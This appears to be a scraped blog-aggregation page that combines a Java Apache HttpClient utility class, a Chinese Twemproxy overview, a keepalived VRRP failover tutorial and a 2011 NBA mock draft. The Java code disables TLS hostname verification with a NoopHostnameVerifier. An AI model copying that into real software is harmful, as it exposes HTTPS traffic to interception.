.setDefaultRequestConfig(requestConfig())
.setRetryHandler(retryHandler())
.build();
} catch (Exception e) {
e.printStackTrace();
}
return httpsClient;
}

// 配置请求的超时设置
//首先设置全局的标准cookie策略
public static RequestConfig requestConfig(){
RequestConfig requestConfig = RequestConfig.custom()
.setCookieSpec(CookieSpecs.STANDARD_STRICT)
.setConnectionRequestTimeout(20000)
.setConnectTimeout(20000)
.setSocketTimeout(20000)
.build();
return requestConfig;
}

public static HttpRequestRetryHandler retryHandler(){
//请求重试处理
HttpRequestRetryHandler httpRequestRetryHandler = new HttpRequestRetryHandler() {
public boolean retryRequest(IOException exception,int executionCount, HttpContext context) {
if (executionCount >= 5) {// 如果已经重试了5次,就放弃
return false;
}
if (exception instanceof NoHttpResponseException) {// 如果服务器丢掉了连接,那么就重试
return true;
}
if (exception instanceof SSLHandshakeException) {// 不要重试SSL握手异常
return false;
}
if (exception instanceof InterruptedIOException) {// 超时
return false;
}
if (exception instanceof UnknownHostException) {// 目标服务器不可达
return false;
}
if (exception instanceof ConnectTimeoutException) {// 连接被拒绝
return false;
}
if (exception instanceof SSLException) {// ssl握手异常
return false;
}

HttpClientContext clientContext = HttpClientContext.adapt(context);
HttpRequest request = clientContext.getRequest();
// 如果请求是幂等的,就再次尝试
if (!(request instanceof HttpEntityEnclosingRequest)) {
return true;
}
return false;
}
};
return httpRequestRetryHandler;
}



//创建HostnameVerifier
//用于解决javax.net.ssl.SSLException: hostname in certificate didn't match: <123.125.97.66> != <123.125.97.241>
static HostnameVerifier hostnameVerifier = new NoopHostnameVerifier(){
@Override
public boolean verify(String s, SSLSession sslSession) {
return super.verify(s, sslSession);
}
};


public static class PoolManager {
public static PoolingHttpClientConnectionManager clientConnectionManager = null;
private static int maxTotal = 200;
private static int defaultMaxPerRoute = 100;

private PoolManager(){
clientConnectionManager.setMaxTotal(maxTotal);
clientConnectionManager.setDefaultMaxPerRoute(defaultMaxPerRoute);
}

private static class PoolManagerHolder{
public static PoolManager instance = new PoolManager();
}

public static PoolManager getInstance() {
if(null == clientConnectionManager)
clientConnectionManager = new PoolingHttpClientConnectionManager();
return PoolManagerHolder.instance;
}

public static PoolingHttpClientConnectionManager getHttpPoolInstance() {
PoolManager.getInstance();
// System.out.println("getAvailable=" + clientConnectionManager.getTotalStats().getAvailable());
// System.out.println("getLeased=" + clientConnectionManager.getTotalStats().getLeased());
// System.out.println("getMax=" + clientConnectionManager.getTotalStats().getMax());
// System.out.println("getPending="+clientConnectionManager.getTotalStats().getPending());
return PoolManager.clientConnectionManager;
}


}

public static class PoolsManager {
public static PoolingHttpClientConnectionManager clientConnectionManager = null;
private static int maxTotal = 200;
private static int defaultMaxPerRoute = 100;

private PoolsManager(){
clientConnectionManager.setMaxTotal(maxTotal);
clientConnectionManager.setDefaultMaxPerRoute(defaultMaxPerRoute);
}

private static class PoolsManagerHolder{
public static PoolsManager instance = new PoolsManager();
}

public static PoolsManager getInstance(Registry<ConnectionSocketFactory> socketFactoryRegistry) {
if(null == clientConnectionManager)
clientConnectionManager = new PoolingHttpClientConnectionManager(socketFactoryRegistry);
return PoolsManagerHolder.instance;
}

public static PoolingHttpClientConnectionManager getHttpsPoolInstance(Registry<ConnectionSocketFactory> socketFactoryRegistry) {
PoolsManager.getInstance(socketFactoryRegistry);
// System.out.println("getAvailable=" + clientConnectionManager.getTotalStats().getAvailable());
// System.out.println("getLeased=" + clientConnectionManager.getTotalStats().getLeased());
// System.out.println("getMax=" + clientConnectionManager.getTotalStats().getMax());
// System.out.println("getPending="+clientConnectionManager.getTotalStats().getPending());
return PoolsManager.clientConnectionManager;
}

}

public static String httpPost(Map<String, String> request, String httpUrl){
String result = "";
CloseableHttpClient httpClient = getHttpClient();
try {
if(MapUtils.isEmpty(request))
throw new Exception("请求参数不能为空");
HttpPost httpPost = new HttpPost(httpUrl);
List<NameValuePair> nvps = new ArrayList<NameValuePair>();
for(Iterator<Map.Entry<String, String>> iterator=request.entrySet().iterator(); iterator.hasNext();){
Map.Entry<String, String> entry = iterator.next();
nvps.add(new BasicNameValuePair(entry.getKey(), entry.getValue()));
}
httpPost.setEntity(new UrlEncodedFormEntity(nvps, Consts.UTF_8));
System.out.println("Executing request: " + httpPost.getRequestLine());
CloseableHttpResponse response = httpClient.execute(httpPost);
result = EntityUtils.toString(response.getEntity());
System.out.println("Executing response: "+ result);
} catch (Exception e) {
throw new RuntimeException(e);
} finally {
try {
httpClient.close();
} catch (IOException e) {
e.printStackTrace();
}
}
return result;
}

public static String httpPost(String json, String httpUrl, Map<String, String> headers){
String result = "";
CloseableHttpClient httpClient = getHttpClient();
try {
if(StringUtils.isBlank(json))
throw new Exception("请求参数不能为空");
HttpPost httpPost = new HttpPost(httpUrl);
for(Iterator<Map.Entry<String, String>> iterator=headers.entrySet().iterator();iterator.hasNext();){
Map.Entry<String, String> entry = iterator.next();
Header header = new BasicHeader(entry.getKey(), entry.getValue());
httpPost.setHeader(header);
}
httpPost.setEntity(new StringEntity(json, Charset.forName("UTF-8")));
System.out.println("Executing request: " + httpPost.getRequestLine());
CloseableHttpResponse response = httpClient.execute(httpPost);
result = EntityUtils.toString(response.getEntity());
System.out.println("Executing response: "+ result);
} catch (Exception e) {
throw new RuntimeException(e);
} finally {
try {
httpClient.close();
} catch (IOException e) {
e.printStackTrace();
}
}
return result;
}

public static String httpGet(String httpUrl, Map<String, String> headers) {
String result = "";
CloseableHttpClient httpClient = getHttpClient();
try {
HttpGet httpGet = new HttpGet(httpUrl);
System.out.println("Executing request: " + httpGet.getRequestLine());
for(Iterator<Map.Entry<String, String>> iterator=headers.entrySet().iterator();iterator.hasNext();){
Map.Entry<String, String> entry = iterator.next();
Header header = new BasicHeader(entry.getKey(), entry.getValue());
httpGet.setHeader(header);
}
CloseableHttpResponse response = httpClient.execute(httpGet);
result = EntityUtils.toString(response.getEntity());
System.out.println("Executing response: "+ result);
} catch (Exception e) {
throw new RuntimeException(e);
} finally {
try {
httpClient.close();
} catch (IOException e) {
e.printStackTrace();
}
}
return result;
}


public static String httpGet(String httpUrl) {
String result = "";
CloseableHttpClient httpClient = getHttpClient();
try {
HttpGet httpGet = new HttpGet(httpUrl);
System.out.println("Executing request: " + httpGet.getRequestLine());
CloseableHttpResponse response = httpClient.execute(httpGet);
result = EntityUtils.toString(response.getEntity());
System.out.println("Executing response: "+ result);
} catch (Exception e) {
throw new RuntimeException(e);
} finally {
try {
httpClient.close();
} catch (IOException e) {
e.printStackTrace();
}
}
return result;
}





maven依赖:
  <!--httpclient-->
        <dependency>
            <groupId>org.apache.httpcomponents</groupId>
            <artifactId>httpclient</artifactId>
            <version>4.5.2</version>
        </dependency>
        <dependency>
            <groupId>org.apache.httpcomponents</groupId>
            <artifactId>httpcore</artifactId>
            <version>4.4.4</version>
        </dependency>
        <dependency>
            <groupId>org.apache.httpcomponents</groupId>
            <artifactId>httpmime</artifactId>
            <version>4.5.2</version>
        </dependency>

<dependency>
<groupId>org.apache.commons</groupId>
<artifactId>commons-collections4</artifactId>
<version>4.1</version>
</dependency>


abin 2016-04-27 19:04 发表评论

           Redis 代理服务Twemproxy    

1、twemproxy explore

      当我们有大量 Redis 或 Memcached 的时候,通常只能通过客户端的一些数据分配算法(比如一致性哈希),来实现集群存储的特性。虽然Redis 2.6版本已经发布Redis Cluster,但还不是很成熟适用正式生产环境。 Redis 的 Cluster 方案还没有正式推出之前,我们通过 Proxy 的方式来实现集群存储

       Twitter,世界最大的Redis集群之一部署在Twitter用于为用户提供时间轴数据。Twitter Open Source部门提供了Twemproxy。

     Twemproxy,也叫nutcraker。是一个twtter开源的一个redis和memcache代理服务器。 redis作为一个高效的缓存服务器,非常具有应用价值。但是当使用比较多的时候,就希望可以通过某种方式 统一进行管理。避免每个应用每个客户端管理连接的松散性。同时在一定程度上变得可以控制。

      Twemproxy是一个快速的单线程代理程序,支持Memcached ASCII协议和更新的Redis协议:

     它全部用C写成,使用Apache 2.0 License授权。项目在Linux上可以工作,而在OSX上无法编译,因为它依赖了epoll API.

      Twemproxy 通过引入一个代理层,可以将其后端的多台 Redis 或 Memcached 实例进行统一管理与分配,使应用程序只需要在 Twemproxy 上进行操作,而不用关心后面具体有多少个真实的 Redis 或 Memcached 存储。 

2、twemproxy特性:

    • 支持失败节点自动删除

      • 可以设置重新连接该节点的时间
      • 可以设置连接多少次之后删除该节点
      • 该方式适合作为cache存储
    • 支持设置HashTag

      • 通过HashTag可以自己设定将两个KEYhash到同一个实例上去。
    • 减少与redis的直接连接数

      • 保持与redis的长连接
      • 可设置代理与后台每个redis连接的数目
    • 自动分片到后端多个redis实例上

      • 多种hash算法:能够使用不同的策略和散列函数支持一致性hash。
      • 可以设置后端实例的权重
    • 避免单点问题

      • 可以平行部署多个代理层.client自动选择可用的一个
    • 支持redis pipelining request

           支持请求的流式与批处理,降低来回的消耗

    • 支持状态监控

      • 可设置状态监控ip和端口,访问ip和端口可以得到一个json格式的状态信息串
      • 可设置监控信息刷新间隔时间
    • 高吞吐量

      • 连接复用,内存复用。
      • 将多个连接请求,组成reids pipelining统一向redis请求。

     另外可以修改redis的源代码,抽取出redis中的前半部分,作为一个中间代理层。最终都是通过linux下的epoll 事件机制提高并发效率,其中nutcraker本身也是使用epoll的事件机制。并且在性能测试上的表现非常出色。

3、twemproxy问题与不足


Twemproxy 由于其自身原理限制,有一些不足之处,如: 
  • 不支持针对多个值的操作,比如取sets的子交并补等(MGET 和 DEL 除外)
  • 不支持Redis的事务操作
  • 出错提示还不够完善
  • 也不支持select操作

4、安装与配置 

具体的安装步骤可用查看github:https://github.com/twitter/twemproxy
Twemproxy 的安装,主要命令如下: 
apt-get install automake  
apt-get install libtool  
git clone git://github.com/twitter/twemproxy.git  
cd twemproxy  
autoreconf -fvi  
./configure --enable-debug=log  
make  
src/nutcracker -h

通过上面的命令就算安装好了,然后是具体的配置,下面是一个典型的配置 
    redis1:  
      listen: 127.0.0.1:6379 #使用哪个端口启动Twemproxy  
      redis: true #是否是Redis的proxy  
      hash: fnv1a_64 #指定具体的hash函数  
      distribution: ketama #具体的hash算法  
      auto_eject_hosts: true #是否在结点无法响应的时候临时摘除结点  
      timeout: 400 #超时时间(毫秒)  
      server_retry_timeout: 2000 #重试的时间(毫秒)  
      server_failure_limit: 1 #结点故障多少次就算摘除掉  
      servers: #下面表示所有的Redis节点(IP:端口号:权重)  
       - 127.0.0.1:6380:1  
       - 127.0.0.1:6381:1  
       - 127.0.0.1:6382:1  
      
    redis2:  
      listen: 0.0.0.0:10000  
      redis: true  
      hash: fnv1a_64  
      distribution: ketama  
      auto_eject_hosts: false  
      timeout: 400  
      servers:  
       - 127.0.0.1:6379:1  
       - 127.0.0.1:6380:1  
       - 127.0.0.1:6381:1  
       - 127.0.0.1:6382:1 

你可以同时开启多个 Twemproxy 实例,它们都可以进行读写,这样你的应用程序就可以完全避免所谓的单点故障。


http://blog.csdn.net/hguisu/article/details/9174459/


abin 2015-11-03 19:30 发表评论

          Deploying Highly Available Virtual Interfaces With Keepalived   

Linux is a powerhouse when it comes to networking, and provides a full featured and high performance network stack. When combined with web front-ends such asHAProxylighttpdNginxApache or your favorite application server, Linux is a killer platform for hosting web applications. Keeping these applications up and operational can sometimes be a challenge, especially in this age of horizontally scaled infrastructure and commodity hardware. But don't fret, since there are a number of technologies that can assist with making your applications and network infrastructure fault tolerant.

One of these technologies, keepalived, provides interface failover and the ability to perform application-layer health checks. When these capabilities are combined with the Linux Virtual Server (LVS) project, a fault in an application will be detected by keepalived, and the virtual interfaces that are accessed by clients can be migrated to another available node. This article will provide an introduction to keepalived, and will show how to configure interface failover between two or more nodes. Additionally, the article will show how to debug problems with keepalived and VRRP.

What Is Keepalived?


The keepalived project provides a keepalive facility for Linux servers. This keepalive facility consists of a VRRP implementation to manage virtual routers (aka virtual interfaces), and a health check facility to determine if a service (web server, samba server, etc.) is up and operational. If a service fails a configurable number of health checks, keepalived will fail a virtual router over to a secondary node. While useful in its own right, keepalived really shines when combined with the Linux Virtual Server project. This article will focus on keepalived, and a future article will show how to integrate the two to create a fault tolerant load-balancer.

Installing KeepAlived From Source Code


Before we dive into configuring keepalived, we need to install it. Keepalived is distributed as source code, and is available in several package repositories. To install from source code, you can execute wget or curl to retrieve the source, and then run "configure", "make" and "make install" compile and install the software:

$ wget http://www.keepalived.org/software/keepalived-1.1.17.tar.gz  $ tar xfvz keepalived-1.1.17.tar.gz   $ cd keepalived-1.1.17  $ ./configure --prefix=/usr/local  $ make && make install 

In the example above, the keepalived daemon will be compiled and installed as /usr/local/sbin/keepalived.

Configuring KeepAlived


The keepalived daemon is configured through a text configuration file, typically named keepalived.conf. This file contains one or more configuration stanzas, which control notification settings, the virtual interfaces to manage, and the health checks to use to test the services that rely on the virtual interfaces. Here is a sample annotated configuration that defines two virtual IP addresses to manage, and the individuals to contact when a state transition or fault occurs:

# Define global configuration directives global_defs {     # Send an e-mail to each of the following     # addresses when a failure occurs    notification_email {        matty@prefetch.net        operations@prefetch.net    }    # The address to use in the From: header    notification_email_from root@VRRP-director1.prefetch.net     # The SMTP server to route mail through    smtp_server mail.prefetch.net     # How long to wait for the mail server to respond    smtp_connect_timeout 30     # A descriptive name describing the router    router_id VRRP-director1 }  # Create a VRRP instance  VRRP_instance VRRP_ROUTER1 {      # The initial state to transition to. This option isn't     # really all that valuable, since an election will occur     # and the host with the highest priority will become     # the master. The priority is controlled with the priority     # configuration directive.     state MASTER      # The interface keepalived will manage     interface br0      # The virtual router id number to assign the routers to     virtual_router_id 100      # The priority to assign to this device. This controls     # who will become the MASTER and BACKUP for a given     # VRRP instance.     priority 100      # How many seconds to wait until a gratuitous arp is sent     garp_master_delay 2      # How often to send out VRRP advertisements     advert_int 1      # Execute a notification script when a host transitions to     # MASTER or BACKUP, or when a fault occurs. The arguments     # passed to the script are:     #  $1 - "GROUP"|"INSTANCE"     #  $2 = name of group or instance     #  $3 = target state of transition     # Sample: VRRP-notification.sh VRRP_ROUTER1 BACKUP 100     notify "/usr/local/bin/VRRP-notification.sh"      # Send an SMTP alert during a state transition     smtp_alert      # Authenticate the remote endpoints via a simple      # username/password combination     authentication {         auth_type PASS         auth_pass 192837465     }     # The virtual IP addresses to float between nodes. The     # label statement can be used to bring an interface      # online to represent the virtual IP.     virtual_ipaddress {         192.168.1.100 label br0:100         192.168.1.101 label br0:101     } } 

The configuration file listed above is self explanatory, so I won't go over each directive in detail. I will point out a couple of items:

  • Each host is referred to as a director in the documentation, and each director can be responsible for one or more VRRP instances
  • Each director will need its own copy of the configuration file, and the router_id, priority, etc. should be adjusted to reflect the nodes name and priority relative to other nodes
  • To force a specific node to master a virtual address, make sure the director's priority is higher than the other virtual routers
  • If you have multiple VRRP instances that need to failover together, you will need to add each instance to a VRRP_sync_group
  • The notification script can be used to generate custom syslog messages, or to invoke some custom logic (e.g., restart an app) when a state transition or fault occurs
  • The keepalived package comes with numerous configuration examples, which show how to configure numerous aspects of the server

Starting Keepalived


Keepalived can be executed from an RC script, or started from the command line. The following example will start keepalived using the configuration file /usr/local/etc/keepalived.conf:

$ keepalived -f /usr/local/etc/keepalived.conf 

If you need to debug keepalived issues, you can run the daemon with the "--dont-fork", "--log-console" and "--log-detail" options:

$ keepalived -f /usr/local/etc/keepalived.conf --dont-fork --log-console --log-detail 

These options will stop keepalived from fork'ing, and will provide additional logging data. Using these options is especially useful when you are testing out new configuration directives, or debugging an issue with an existing configuration file.

Locating The Router That is Managing A Virtual IP


To see which director is currently the master for a given virtual interface, you can check the output from the ip utility:

VRRP-director1$ ip addr list br0 5: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN      link/ether 00:24:8c:4e:07:f6 brd ff:ff:ff:ff:ff:ff     inet 192.168.1.6/24 brd 192.168.1.255 scope global br0     inet 192.168.1.100/32 scope global br0:100     inet 192.168.1.101/32 scope global br0:101     inet6 fe80::224:8cff:fe4e:7f6/64 scope link         valid_lft forever preferred_lft forever  VRRP-director2$ ip addr list br0 5: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UNKNOWN      link/ether 00:24:8c:4e:07:f6 brd ff:ff:ff:ff:ff:ff     inet 192.168.1.7/24 brd 192.168.1.255 scope global br0     inet6 fe80::224:8cff:fe4e:7f6/64 scope link         valid_lft forever preferred_lft forever 

In the output above, we can see that the virtual interfaces 192.168.1.100 and 192.168.1.101 are currently active on VRRP-director1.

Troubleshooting Keepalived And VRRP


The keepalived daemon will log to syslog by default. Log entries will range from entries that show when the keepalive daemon started, to entries that show state transitions. Here are a few sample entries that show keepalived starting up, and the node transitioning a VRRP instance to the MASTER state:

Jul  3 16:29:56 disarm Keepalived: Starting Keepalived v1.1.17 (07/03,2009) Jul  3 16:29:56 disarm Keepalived: Starting VRRP child process, pid=1889 Jul  3 16:29:56 disarm Keepalived_VRRP: Using MII-BMSR NIC polling thread... Jul  3 16:29:56 disarm Keepalived_VRRP: Registering Kernel netlink reflector Jul  3 16:29:56 disarm Keepalived_VRRP: Registering Kernel netlink command channel Jul  3 16:29:56 disarm Keepalived_VRRP: Registering gratutious ARP shared channel Jul  3 16:29:56 disarm Keepalived_VRRP: Opening file '/usr/local/etc/keepalived.conf'. Jul  3 16:29:56 disarm Keepalived_VRRP: Configuration is using : 62990 Bytes Jul  3 16:29:57 disarm Keepalived_VRRP: VRRP_Instance(VRRP_ROUTER1) Transition to MASTER STATE Jul  3 16:29:58 disarm Keepalived_VRRP: VRRP_Instance(VRRP_ROUTER1) Entering MASTER STATE Jul  3 16:29:58 disarm Keepalived_VRRP: Netlink: skipping nl_cmd msg... 

If you are unable to determine the source of a problem with the system logs, you can use tcpdump to display the VRRP advertisements that are sent on the local network. Advertisements are sent to a reserved VRRP multicast address (224.0.0.18), so the following filter can be used to display all VRRP traffic that is visible on the interface passed to the "-i" option:

$ tcpdump -vvv -n -i br0 host 224.0.0.18 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on br0, link-type EN10MB (Ethernet), capture size 96 bytes  10:18:23.621512 IP (tos 0x0, ttl 255, id 102, offset 0, flags [none], proto VRRP (112), length 40) \                 192.168.1.6 > 224.0.0.18: VRRPv2, Advertisement, vrid 100, prio 100, authtype simple,                  intvl 1s, length 20, addrs: 192.168.1.100 auth "19283746"  10:18:25.621977 IP (tos 0x0, ttl 255, id 103, offset 0, flags [none], proto VRRP (112), length 40) \                 192.168.1.6 > 224.0.0.18: VRRPv2, Advertisement, vrid 100, prio 100, authtype simple,                  intvl 1s, length 20, addrs: 192.168.1.100 auth "19283746"                          ......... 

The output contains several pieces of data that be useful for debugging problems:

authtype - the type of authentication in use (authentication configuration directive) vrid - the virtual router id (virtual_router_id configuration directive) prio - the priority of the device (priority configuration directive) intvl - how often to send out advertisements (advert_int configuration directive) auth - the authentication token sent (auth_pass configuration directive) 

Conclusion


In this article I described how to set up a host to use the keepalived daemon, and provided a sample configuration file that can be used to failover virtual interfaces between servers. Keepalived has a slew of options not covered here, and I will refer you to the keepalived source code and documentation for additional details



abin 2015-11-01 21:06 发表评论

          Casper's Final 2011 NBA Mock Draft   
Final 2011 Mock Draft with odds that the pick is dealt and brief summaries.

Many thanks to the following people for various rumors:
Jonathan Givony (@DraftExpress)
Chad Ford (@chadfordinsider)
Scott Schroeder (@ScottSchroeder)

Don't forget to check out my Final Big Board

Enjoy!

1. Cleveland (from LAC) - Kyrie Irving (PG), Duke:
Odds pick is dealt: Zero
The Cavs say “Thank you” to the Clippers for gifting them a franchise PG. Off-the-court drama could steal some of his spotlight on draft night.

2. Minnesota - Derrick Williams (PF/SF), Arizona:
Odds pick is dealt: 50%
The Wolves are stuck with a tough choice to make after they take Williams, either keep him and figure out how to make the rotation work with a forward-heavy roster, or deal him for a SG or C. There are so many rumors floating about, that I can’t do anything but label this 50:50.

3. Utah (from NJN) - Brandon Knight (PG/SG), Kentucky:
Odds pick is dealt: Minimal
Do the Jazz go guard here or at #12? That’s the million dollar question. It appears that they have fallen in love with Knight, but they are open to selecting Kanter or Vesely as well.

4. Cleveland - Enes Kanter (C/PF), Turkey:
Odds pick is dealt: 40%
After going Kyrie with their first pick, the Cavs look at going with a C with their second pick. With the selection of Kanter they will have a good PnR partner for Kyrie - and he’ll have the luxury of being able to develop while playing behind Varejao... something which may be needed given his situation last year. They could also move this pick to a team wanting to bid for Kanter, and then move back and take Valanciunas - something to keep an eye on.

5. Toronto - Kemba Walker (PG), Connecticut:
Odds pick is dealt: Minimal
Reports coming out of Toronto are muddled, and there are seemingly 5-6 prospects tied to them at this spot. The one thing I believe is that if Knight is here, he’s the pick - problem is he likely won’t be on the board. Therefore they take Walker who gives them a tough-nosed PG who can produce on both ends of the floor and is a leader in every sense of the word. Dwane Casey should love him.

6. Washington - Jan Vesely (SF/PF), KK Partizan Belgrade:
Odds pick is dealt: 40%
All reports point to the Wizards absolutely loving Vesely. If he can refine his shot from deep, watch out - Wall just found himself an uber-athletic Forward to run the floor with him. If they move the pick it’s going to be to land Kanter.

7. Sacramento - Kawhi Leonard (SF), San Diego State:
Odds pick is dealt: 25%
The Kings want an impact player at this spot, and while they could give Fredette a look because of his offensive fit next to Evans, I think they go with Leonard. Kawhi is able to be slotted in at SF and they will be able to cover up his offensive flaws while hopefully reaping the benefits of his defense and hustle. It’s possible that they move this pick to a team wanting Valanciunas.

8. Detroit - Jonas Valanciunas (C), Lietuvos Rytas:
Odds pick is dealt: 50%
The Jonas slide stops at #8. Will he stay with the Pistons? He could... but Monroe and Jonas are a questionable pairing and they may want some immediate help given the rumors that JV will have to stay at least one season in Europe before coming over. Whatever the case may be, this could be considered great value.

9. Charlotte - Marcus Morris (PF/SF), Kansas:
Odds pick is dealt: Minimal
Charlotte reportedly wants to come out of this draft with an NBA ready player who can help spread the floor. Enter Marcus Morris who can score efficiently from everywhere on the court and can possibly play both Forward spots... very safe choice.

10. Milwaukee - Alec Burks (SG), Colorado:
Odds pick is dealt: 40%
In dire need of improved efficiency out of the backcourt after ranking dead last in offensive efficiency in 2010-11, Milwaukee looks to find a SG who can fill it up. With Jennings loving to chuck up 3’s, they need a guy like Burks alongside him to take it to the rim. If they can move down and add more picks, it’s still possible they can get their guy.

11. Golden State - Chris Singleton (SF/PF), Florida State:
Odds pick is dealt: 25%
Reports coming out of Golden State point to West loving Thompson, but they also have their coach and GM preaching defense. I think they have to go defense here, preferably on the wing. Singleton is able to guard SG, SF, or PF and has also shown the ability to get out and run or knock down 3s - thus making him a good fit for the Warriors.

12. Utah - Marshon Brooks (SG), Providence:
Odds pick is dealt: 60%
The Jazz are left staring Jimmer in the face and are basically forced to pass on a guy hometown fans love. They could move up or down, but if they stay at 12, they could tab Marshon as a NBA-ready scorer with great length.

13. Phoenix - Tristan Thompson (PF), Texas:
Odds pick is dealt: 25%
Reports are that the Suns pick will come from a workout that featured Shumpert, the Morris twins, Singleton, Thompson, and Jimmer. I think Thompson gets the nod as what could turn out to be an upgrade to their PF spot right away despite being raw. Look for them to make a move to acquire a PG (Flynn?) in a deal that might involve this pick.

14. Houston - Bismack Biyombo (C/PF), Baloncesto Fuenlabrada:
Odds pick is dealt: 40%
Houston is still in need of a C, despite trading for Thabeet last season. In Biyombo, they acquire a guy with immense upside on the defensive end, but is as raw as can be offensively. That works for new coach Kevin McHale who wants defense and already has a guy in Scola who can get him buckets in the paint. If they can find a partner in the mid-lotto to trade with, they’ll do it.

15. Indiana - Jimmer Fredette (PG/SG), BYU:
Odds pick is dealt: Minimal
Coming off a nice season that saw them back in the playoffs for the first time in five years, Indiana takes Fredette who, despite having Collison as a starter, rounds out what could be a nice backcourt rotation by an outside shooter who can get incredibly hot.

16. Philadelphia - Klay Thompson (SG/SF), Washington State:
Odds pick is dealt: 25%
Very little is coming out of Philly about the draft, some of it may have to do with them having trouble getting prospects to work out for them, but there’s also the Iguodala rumors. I think if they move Iggy, they should take a wing that can spread the floor and work off the ball - enter Klay Thompson, who has been impressing in workouts.

17. New York - Iman Shumpert (SG), Georgia Tech:
Odds pick is dealt: Minimal
The Knicks need defense first and foremost. In Iman, they get a versatile defender with great tools while also being able to handle the ball a little. Word is that Knicks want him, and odds are there won’t be teams ahead of them who are going to spoil their party. Rumor has it they may want to move up and nab Biyombo - but what do they have to offer? I think they're stuck.

18. Washington (from ATL) - Donatas Motiejunas (PF/C), Benetton Treviso:
Odds pick is dealt: 50%
The Wizards nab Motiejunas who has great upside and can score in a variety of ways. He could be an eventual replacement for Blatche, and at this point represents solid value. As this isn’t an excellent fit, the Wizards could move the pick - especially if they move up to get Kanter.

19. Charlotte (from NOH) - Markieff Morris (PF), Kansas:
Odds pick is dealt: Minimal
The Bobcats nab the second Morris twin, hoping that their chemistry carries over. This isn’t just a sentimental pick, however - Markieff should be a good energy big off the bench that provides defense and rebounding, while also fitting the “safe” mantra that Charlotte is advocating.

20. Minnesota (from MEM) - Jordan Hamilton (SF/SG), Texas:
Odds pick is dealt: Extremely high
The Timberwolves really don’t have room to bring in two rookies as well as Rubio. Therefore, this pick is not representing what I think the Wolves will pick, but who reports consider BPA -Jordan Hamilton.

21. Portland - Nikola Vucevic (C), USC:
Odds pick is dealt: 40%
Portland lacks healthy size. Although Vucevic overlaps with LMA’s skillset, he should be able to play right away and reportedly has been doing well in workouts. Rumors are that Portland wants a vet, so I wouldn’t be surprised to see this moved in a package to acquire one.

22. Denver - Kenneth Faried (PF), Morehead State:
Odds pick is dealt: 25%
Faried fits the up-tempo style of play Denver likes to play and gives the Nuggets a strong rebounder and defender for a team that could possibly lose two of their bigs to free agency - not to mention they have a lot of scorers on the roster so his biggest weakness is covered up.

23. Houston (from ORL) - Tobias Harris (SF/PF), Tennessee:
Odds pick is dealt: 75%
Houston is another team that doesn’t really have room to bring in more rookies, however I could see them keeping the pick if someone like Harris fell. While he’s not similar to Battier as some claim, he is a very smart player who could see rotation minutes right away despite currently being 18.

24. Oklahoma City - Davis Bertans (SF), Union Olimpija Ljubljana:
Odds pick is dealt: 25%
The Thunder really have no rotational needs that can be satisfied with this pick, so they take Bertans who can be stashed overseas for another year or two before coming over.

25. Boston - Jeremy Tyler (C/PF), Tokyo Apache:
Odds pick is dealt: 40%
I have no idea what Boston will do here, because they only have a year or two left of their aging superstars, and then it’s just Rondo and maybe Green. Because of that, I’ll do something nonsensical and stick them with Tyler who is arguably the biggest unknown of the draft, but has great physical tools.

26. Dallas - Justin Harper (PF/SF), Richmond:
Odds pick is dealt: 25%
The Mavs really lose offensive firepower when Dirk goes to the bench - to the point where it’s going to be a problem. Yes, they are in “win now” mode, but I could see Harper playing a role on this team next year... possibly an important one off the bench.

27. New Jersey (from LAL) - Tyler Honeycutt (SF/SG), UCLA:
Odds pick is dealt: 75%
It’s being reported that the Nets want to move up from this spot, and it trying to use #35 in order to do so. However, if they do not move up, I think Honeycutt makes sense as a versatile wing that is a bit of a project.

28. Chicago (from MIA) - Charles Jenkins (PG/SG), Hofstra:
Odds pick is dealt: 60%
If they can’t move this pick, Chicago could go with Jenkins - a comboguard who is NBA ready and can create for himself and others.

29. San Antonio - Kyle Singler (SF/PF), Duke:
Odds pick is dealt: Minimal
The Spurs aren’t giving up hope that their window has closed. As such, they take a guy who can help them immediately as long as he improves his shot selection.

30. Chicago - Bojan Bogdanovic (SG/SF), Cibona VIP Zagreb:
Odds pick is dealt: 40%
Again, another pick they will try to move... however this one will be harder. If they can’t move it, I see them taking a guy they can stash overseas and hope it pays dividends when they finally come over. In this case, it’s one of the best scorers in Europe: Bojan Bogdanovic.


31. Miami (from MIN) - Reggie Jackson (PG/SG), Boston College
32. Cleveland - Jimmy Butler (SF), Marquette
33. Detroit (from TOR) - Darius Morris (PG/SG), Michigan
34. Washington - Malcolm Lee (SG/PG), UCLA
35. New Jersey - Nikola Mirotic (PF), Real Madrid
36. Sacramento - Josh Selby (SG/PG), Kansas
37. LA Clippers (from DET) - JaJuan Johnson (PF), Purdue
38. Houston (from LAC) - Travis Leslie (SG), Georgia
39. Charlotte - Nolan Smith (PG/SG), Duke
40. Milwaukee - Norris Cole (PG), Cleveland State
41. LA Lakers (from GSW) - Cory Joseph (PG), Texas
42. Indiana - Chandler Parsons (SF), Florida
43. Chicago (from UTA) - Jon Leuer (C), Wisconsin
44. Golden State (from PHX) - Jordan Williams (C), Maryland
45. New Orleans (from PHI) - E’Twaun Moore (SG), Purdue
46. LA Lakers (from NYK) - Scotty Hopson (SG/SF), Tennessee
47. LA Clippers (from HOU) - Trey Thompkins (PF), Georgia
48. Atlanta - Shelvin Mack (SG/PG), Butler
49. Memphis - Keith Benson (PF/C), Oakland
50. Philadelphia (from NOH) - Greg Smith (PF/C), Fresno State
51. Portland - Demetri McCamey (PG), Illinois
52. Detroit (from DEN) - Jereme Richmond (SF), Illinois
53. Orlando - David Lighty (SG/SF), Ohio State
54. Cleveland (from OKC) - Xavi Rabaseda (SG), Baloncesto Fuenlabrada
55. Boston - Ben Hansbrough (PG/SG), Notre Dame
56. LA Lakers - Isaiah Thomas (PG/SG), Washington
57. Dallas - Josh Harrellson (C), Kentucky
58. LA Lakers (from MIA) - Robin Benzig (SF/PF), Ratiopharm Ulm
59. San Antonio - Giorgi Shermadini (C), Union Olimpija Ljubljana
60. Sacramento (from CHI) - Andrew Goudelock (PG), Charleston
          Casper's Final 2011 NBA Draft Big Board   
Final rankings of players, with Tiers and likely ranges (guys who are considered to have the 2nd round be the highest they will be drafted labeled 31-Undrafted) - players tabbed as 1st rounders have the teams who appear to have the most interest in them.

Tier 1:
1. Kyrie Irving - Fr. PG, Duke
Range: 1-2 --- Most likely: Cavaliers

Tier 2:
2. Derrick Williams - So. PF/SF, Arizona
Range: 1-2 --- Most likely: Timberwolves

Tier 3:
